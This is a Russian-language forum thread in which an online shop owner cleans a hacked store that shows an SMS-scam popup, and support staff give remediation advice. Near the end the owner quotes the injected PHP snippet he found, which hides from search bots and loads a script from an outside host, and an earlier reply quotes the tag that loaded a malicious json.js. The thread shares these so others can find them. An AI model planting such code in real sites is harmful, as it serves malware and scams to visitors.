Заразили вирусом. Нужна помощь =)

[magentashop 0]

В общем приключилась следующая ситуация.

Вчера подвисли все сайты капитально, позвонил хостеру, перезагрузили там что-то и всё заработало, НО

после перезагрузки при заходе на карточку товара появилось окно с предложением отправить смс на короткий номер :) Скриншот прикрепляю

Вместе с хостером нашли вредностный файл по имени json.js и удалили его, что проблему решило.

Но, какой-то код из шаблона запускает выполнение этого скрипта, вот этот код так и не могу найти. (по дате изменения всё проверил, все файлы шаблона изменялись последний раз более года назад)

Подскажите знающие, где эту вредину искать.

P.S. Хостинг NIC.ru версия магазина 1.59

P.P.S. Заранее спасибо за ответы.

[YuraS 4]

</body></html>

<script src="admin/includes/javascript/json.js"></script><div id="parseTime">Parse time: 0.340, queries: 121</div>

сам код может быть встроен куда угодно. если не можете найти самостоятельно, то рекомендую обратиться сюда.

[support 447]

magentashop

Нужно обновиться Вам.

И обязательно удалить папку /admin/includes/javascript/tiny_mce/plugins/tinybrowser

Если есть такая папка.

Просто почистить загаженные файлы - недостаточно, в этом нет смысла без обновления.

[magentashop 0]

Папки Tinybrowser нет. А вот похожая папка tiny_mce есть. может её удалить? :)

[support 447]

Нет, её не удалять.

Вообще, у Вас довольно старая версия, и, если я правильно помню, после 1.59 были найдены и закрыты дырки в скриптах.

Так что очень желательно обновиться.

[magentashop 0]

Спасибо за помощь. Вроде излечился, ждём заключения яндекса...

Боюсь, что весь шаблон и все доработки при обновлении съедут, потому и не обновляюсь пока =)

[support 447]

Тогда ждите пока снова сломают, ведь наверняка используют дырки, которые были в старых версиях и которых закрывались обновлениями.

Если не хотите обновляться, то хотя бы закройте админку паролем через .htpasswd файл, удалите файл /affiliate_show_banner.php

[magentashop 0]

Тут у меня новая проблема образовалась после установки антивируса.

NOD 32 ругается на троян Kryptik.JW , Kryptik.JO и Kryptik.KC Подскажите, в каком направлении копать :)

[support 447]

Бывают вирусы, которые воруют доступ на ftp с Вашего компа и гадят по всем сайтам, прописанным в ftp.

Может это Ваш случай как раз.

[magentashop 0]

Всё!!! Яндекс проверил и сказал, что вирусов больше нет, как камень с души =)

Проблема в итоге была во вредностном коде в файлах product_infp.php и index.php

Привожу пример кода, который прописывался в файлах в самом низу, вдруг кому-то поможет =)

if(!stristr(getenv('HTTP_USER_AGENT'),"bot")&&!stristr(getenv('HTTP_USER_AGENT'),"google")&&!stristr(getenv('HTTP_USER_AGENT'),"yandex")){

echo "<script language='JavaScript' src='http://uni33.ru/codenj.php?codenj=23311'></script>";

причём дата изменения файла была давнишняя, так что будьте бдительны, товарищи, враг не дремлет =)

support, сейчас на все компы ставлю антивирусы и буду в ближайшее время обновляться, гром грянул, так что пора мужику креститься =)

Всем спасибо за помощь.

[support 447]

Удачи